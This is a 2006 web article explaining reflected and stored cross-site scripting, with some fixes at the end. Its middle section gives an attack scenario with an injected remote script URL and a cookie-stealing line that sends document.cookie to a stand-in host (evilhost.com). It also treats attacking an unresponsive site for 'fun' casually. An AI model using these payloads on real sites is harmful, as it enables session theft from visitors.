Report this Article

XSS Vulnerabilities, So understimated, so dangerous


  • Comments 0
  • Views 0

In this little paper I will try to convince admins, webmaster
and in general everyone is concerned to secure a web site of how
dangerous can be a XSS hole. I will not cover in depth what XSS
is because there’s a huge library on this topic available on
internet and on www.hackerscenter.com/library

–[ 2.0 XSS So what’s XSS? XSS stands for cross site scripting,
that is a way to inject script code into a web page making it
execute whenever the page loads or a specific event is triggered.

2.1 Temporary XSS

A factor because of which this kind of bug is understimated is
due to the “temporary xss” as I use to call them. Temporary xss
are script codes executed only when a script code within a
crafted input is issued by the user.

Example: http://vuln.host.com/search.asp?q=

<p>The above example will inject a &#8220; <plaintext>&#8221; tag in the<br /> search.asp page showing the source html code of the page The<br /> point here is: Who searched for <plaintext> will see the source<br /> code but this not implies any permanent alteration of the page.</p> <p> 2.2 Permanent XSS</p> <p>A &#8220;permanent XSS&#8221; as I use to call them, are due to unsanitized<br /> input by user that will be saved on a database for example. Each<br /> time these unsanitized fields are read from the database and<br /> printed on the page the script will be executed. (A lot of<br /> registration forms server side scripts are affected by this kind<br /> of vuln)</p> <p>&#8211;[ 3.0 Attacks</p> <p>What I want to demonstrate in this article is how dangerous can<br /> be a temporary xss. Most of the webmaster (99%, believe me),<br /> treat this kind of bug as very very low level issue because of<br /> the reasons we have seen. They think it is even a loss of time<br /> to sanitize input that doesn&#8217;t go into a database.</p> <p>What they seem to be unable to understand is that whenever a<br /> malicious user is able to run a client side script from their<br /> domain name a cookie stealing attack can be *easily* taken. This<br /> becomes a high level risk vuln when we deal with ecommerce site,<br /> webmail service and similar.</p> <p> 3.1 Scenario 1</p> <p>Let&#8217;s assume that we&#8217;ve found a xss vuln into 2 sites. The first<br /> will be used as the &#8220;dumb&#8221; (A) site, that has a permanent xss<br /> hole, while the latter will be a big shopping portal (B) I want<br /> to steal cookie from, that has &#8220;just&#8221; a little innocent<br /> temporary xss hole.</p> <p>We mail the big shopping portal admin about the vuln, trying to<br /> make him understand how serious it is the bug. He never reply.<br /> So we decide to have some fun&#8230;innocent fun..as much innocent<br /> as their xss hole was, I suppose&#8230;</p> <p>What one could do is to inject a stealth script into the dumb<br /> site to force (always stealthly) every visitor of site A to load<br /> the vulnerable url we have found into site B. Here anyone can<br /> understand that even<br /> http://vuln.host.com/search.asp?q= <plaintext> is now very very<br /> useful for our purpose. Instead of <plaintext>, we can use<br /> something like this: http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script></p> <p>Funny.js will be our malicious script code that will be run on<br /> vuln.host.com domain &#8230;and it will be similar to this: //<br /> Funny.js navigate to &#8216;evilhost.com/collect_cookies.asp?cookie=&#8217;<br /> + document.cookie // where collect_cookies.asp will be a server<br /> side script that will collect everything passed by parameter<br /> &#8220;cookie&#8221; and evilhost.com can be a hosting space set up by the<br /> malicious attacker.</p> <p>So what happens here? 1. A user visits dumb site thus triggering<br /> our permanent xss. 2. The permanent xss will load the page</p> <p>http://vuln.host.com/search.asp?q=<script</p> <p>src='http://myhosting.com/xsstrials/funny.js'></script> that<br /> executes funny.js thanks to the temporary xss hole in the big<br /> shopping portal. 3. funny.js is now loaded on the big shopping<br /> portal domain name letting us steal the cookie (and the login<br /> data) of the dumb site visitor.</p> <p> By &#8220;stealth script&#8221; we mean a script that doesn&#8217;t change the<br /> appearance of the page so that no one will notice any background<br /> work.</p> <p> &#8212; [ Side effects</p> <p>In this section I will show some side effects of the xss desease<br /> that are often forgotten or misunderstood by a lot of<br /> analysts/webmasters.</p> <p>The xss holes, permanent and tempory ones, can be used to attack<br /> a local victim (visitor of the vulnerable site) directly by<br /> injecting a malicious code capable of exploting a local<br /> vulnerability of the victim system. This has become very common<br /> (and easy to do) because of the tons of vulnerabilities that<br /> affect Internet Explorer and the browsers in general. </p> <p>Let&#8217;s take for example a xss hole into trustedsite.com. Anyone<br /> could take advantage of the trustness of this domain to execute<br /> code with high privilege levels, executing or installing<br /> malicious activex. This kind of approach can be taken into<br /> Internet Exlporer and in general in all the browsers that use<br /> the so called trusted &#8220;Zones&#8221;.</p> <p>Another important issue that can make a simple XSS hole a high<br /> level risk issue is the capability of attacking thousands<br /> computers into few hours or even into minutes according to the<br /> traffic of the vulnerable page. This kind of practice can lead<br /> to malware/adware spread. If a high traffic page is vulnerable<br /> to a permanent xss a malware/worm/adware coder can choose this<br /> kind of approach to put the seeds of his worm making it spread<br /> in a stealth manner and within few time.</p> <p> &#8212; [ How to solve the problem</p> <p>Incredible to say, XSS holes are the most simple to solve and<br /> fix. They usually involve script tag but not always. Less known<br /> code can use the image tag with dynsrc or src parameters and<br /> &#8220;javascript:alert(&#8216;aaa&#8217;)&#8221; as argument or the<br /> <style> tag e.g. :</p> <style type="text/javascript">script goes here</style> <p> In general the characters to be sanitized are the usual "<" and<br /> ">" but there are some more to be carefully escaped: &#038;{code};<br /> will run the code into netscape / mozilla browsers so "&#038;{"<br /> combination of chars should be sanitized too. In the 99% of the<br /> cases an "HTML Encode" would solve the problem. In asp it can be<br /> easily done with the inbuilt function<br /> server.htmlencode(myparameter).</p> <div class="addtoany_share_save_container"><div class="a2a_kit a2a_target addtoany_list" id="wpa2a_1"><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://articles.org/wp-content/plugins/add-to-any/share_save_256_24.png" width="256" height="24" alt="Share"/></a></div> <script type="text/javascript"><!-- wpa2a.script_load(); //--></script> </div> <!-- end content --> <div class="post_footer"> <div class="tags_link"> <img src="http://articles.org/wp-content/themes/article_directory/images/bg_tag.png" alt=""/> </div> </div> </div> <div class="box author"> <p> <img src="http://articles.org/wp-content/themes/article_directory/images/no_avatar.gif" alt="admin" style="float:left; display:inline; margin-right:10px; padding:1px; border:1px #b2b2b2 solid;width: 86px; height:86px" /> <strong>Article's Source: </strong><a href="http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/">http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/</a><br/><strong>Author: </strong><a href="http://articles.org/author/admin/" title="Posts by admin" rel="author">admin</a><br/> </p> <div class="sub_icon"> <br /> <ul> <li>Posted On April 19, 2006 </li> <li>Published articles 283513 </li> </ul> </div> </div> <!-- COMMENTS --> <div class="box" style="border-bottom:none; text-align:right;"> <div class="wp-pagenavi"> <p> </p> </div> </div> </div> <div class="col_boxgrey4"> <div class="title"> <h2>Post Comment</h2> </div> <form id="commentform" action="http://articles.org/wp-comments-post.php" method="post"> <div class="comment-box-message" style="display: none"> <div> </div> </div> <div class="register"> <label><strong> Username:</strong> <span class="red">*</span> </label> <div class="registerby"> <input id="comment-name" type="text" name="author" size="29px" value=""/> </div> </div> <div class="clear"></div> <div class="register"> <label><strong> Email:</strong> <span class="red">*</span> </label> <div class="registerby"> <input id="comment-email" type="text" name="email" size="29px" value=""/> </div> </div> <div class="clear"></div> <div class="register"> <label><strong>Website:</strong></label> <div class="registerby"> <input id="comment-url" type="text" name="url" size="29px" value="""/> </div> </div> <div class="register"> <label><strong>Message:</strong> </label> <div class="registerby2"> <textarea id="comment-content" rows="8" cols="30" name="comment"></textarea> </div> </div> <div class="clear"></div> <input type='hidden' name='comment_post_ID' value='80563' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> <p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="9f8107067d" /></p> <script type='text/javascript'> var RecaptchaOptions = { theme : 'red', lang : 'en' , tabindex : 5 }; </script><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LeuMOISAAAAACtRXavmReEPOFbsRWeuY0YuEJs4"></script> <noscript> <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LeuMOISAAAAACtRXavmReEPOFbsRWeuY0YuEJs4" height="300" width="500" frameborder="0"></iframe><br/> <textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea> <input type="hidden" name="recaptcha_response_field" value="manual_challenge"/> </noscript> <div id="recaptcha-submit-btn-area">&nbsp;</div> <noscript> <style type='text/css'>#submit {display:none;}</style> <input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment"/> </noscript> <div class="register register_button"> <input type="submit" name="submit" value="Post Comment" class="button" /> </div> </form> </div> <!-- Recent Artcle --> <div class="col_boxgrey4" style="display:none"> <div class="title" style="width:690px; height:34px; border-left:none; border-right:none; border-top:none;"> <h2 style="margin-top:8px;"> </h2> </div> <div class="box" style="border-bottom:none;"> <div class="col_boxgrey5"> <ul> </ul> </div> <!-- ADVERTISING --> <!-- END ADVERTISING --> </div> </div> </div> <!-- END BODY --> <!-- SIDEBAR --> <div class="col_right"> <!-- <div class="col_boxgrey2"> <div class="box2" style="padding-bottom:15px;"> <h2> <img src="http://articles.org/wp-content/themes/article_directory/images/sidebar-arrow.png" alt=""/>Related Searches </h2> </div> </div> --> <div class="col_boxgrey2"><div class="box2"><h2><img src="http://articles.org/wp-content/themes/article_directory/images/sidebar-arrow.png" alt=""/>Top Categories</h2></div><ul class="popular-category-list"><li><a href="http://articles.org/category/Business/">Business <span>64975</span></a></li><li><a href="http://articles.org/category/Other/">Other <span>57811</span></a></li><li><a href="http://articles.org/category/Sports/">Sports <span>47158</span></a></li><li><a href="http://articles.org/category/health-medical/">Health and Medical <span>41244</span></a></li><li><a href="http://articles.org/category/uncategorized/">Uncategorized <span>28430</span></a></li><li><a href="http://articles.org/category/internet_marketing/">Internet_Marketing <span>19595</span></a></li><li><a href="http://articles.org/category/home-garden/">Home-and-Garden <span>14096</span></a></li><li><a href="http://articles.org/category/Travel/">Travel <span>13827</span></a></li><li><a href="http://articles.org/category/Finance/">Finance <span>11865</span></a></li><li><a href="http://articles.org/category/Entertainment/">Entertainment <span>11520</span></a></li></ul></div><div class="col_boxgrey2"> <div class="textwidget"><div>&nbsp;</div> <script src="http://widgets.twimg.com/j/2/widget.js"></script> <script> new TWTR.Widget({ version: 2, type: 'search', search: 'articlesorg', interval: 30000, title: 'The best of Twitter according to', subject: 'Articles.Org Article Directory', width: 'auto', height: 500, theme: { shell: { background: '#F1F1F1', color: '#000000' }, tweets: { background: '#ffffff', color: '#000000', links: '#F9951C' } }, features: { scrollbar: false, loop: false, live: true, behavior: 'all' } }).render().start(); </script></div> </div> </div> </div> </div> </div> <div style="clear:both;"></div> <script type="text/javascript"> function recent(){ document.getElementById('st1').style.display ="block"; document.getElementById('st2').style.display ="none"; } function viewed(){ document.getElementById('st2').style.display ="block"; document.getElementById('st1').style.display ="none"; } </script> <!-- END SIDEBAR --> </div> <!--end wrapper--> <!-- FOOTER --> <div id="footer"> <div class="footer_res"> <div class="fott_top footer_links" style='text-align:center'> <a href='/articles-about/'>About Us</a> | <a href='/terms-and-conditions/'>Terms and Conditions</a> | <a href='/privacy-policy/'>Privacy Policy</a> | <a href='/wp-content/themes/article_directory/new_contact.php'>Contact Us</a> </div> <div class="footer_main"> <div class="foot_right"> <div class="fott"><h3><span>Follow Us:</span></h3><div class="icon"><a href="http://twitter.com/articlesorg"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_t.png" alt=""/></a><a href="http://www.facebook.com/pages/Articles-Organization/140232106038330"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_f.png" alt=""/></a><a href="http://www.addthis.com/bookmark.php?v=250&username=orifastlich"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_share.png" alt=""/></a></div></div> </div> <div class="foot_left"> <div class="copyright"> <p> <span>Copyright © 2010 Article Directory Powered by WordPress</span> </p> </div> </div> </div> </div> </div> <script type="text/javascript"><!-- wpa2a.targets=[ {title:'XSS Vulnerabilities, So understimated, so dangerous',url:'http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/'}]; wpa2a.html_done=true;if(wpa2a.script_ready&&!wpa2a.done)wpa2a.init();wpa2a.script_load(); //--></script> <script type="text/javascript"> var sub = document.getElementById('submit'); document.getElementById('recaptcha-submit-btn-area').appendChild (sub); document.getElementById('submit').tabIndex = 6; if ( typeof _recaptcha_wordpress_savedcomment != 'undefined') { document.getElementById('comment').value = _recaptcha_wordpress_savedcomment; } document.getElementById('recaptcha_table').style.direction = 'ltr'; </script> </body> </html> <script type="text/javascript"> jQuery(document).ready(function(){ jQuery('.comment-box-message').hide(); jQuery('#commentform').submit(function(){ if (jQuery.trim(jQuery('#comment-name').val()) == ''){ jQuery('.comment-box-message div').html("Name can't be empty"); jQuery('.comment-box-message').show(); return false; } if (jQuery.trim(jQuery('#comment-email').val()) == ''){ jQuery('.comment-box-message div').html("Email can't be empty"); jQuery('.comment-box-message').show(); return false; } if (!validateEmail(jQuery('#comment-email').val())){ jQuery('.comment-box-message div').html("Email is invalid"); jQuery('.comment-box-message').show(); return false; } if (jQuery.trim(jQuery('#comment-content').val()) == ''){ jQuery('.comment-box-message div').html("Comment content can't be empty"); jQuery('.comment-box-message').show(); return false; } jQuery('.comment-box-message').hide(); }); }); </script> <!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/ Page Caching using disk: enhanced Database Caching 1/7 queries in 0.096 seconds using memcached Object Caching 2022/2033 objects using memcached Served from: articles.org @ 2014-11-01 05:04:16 -->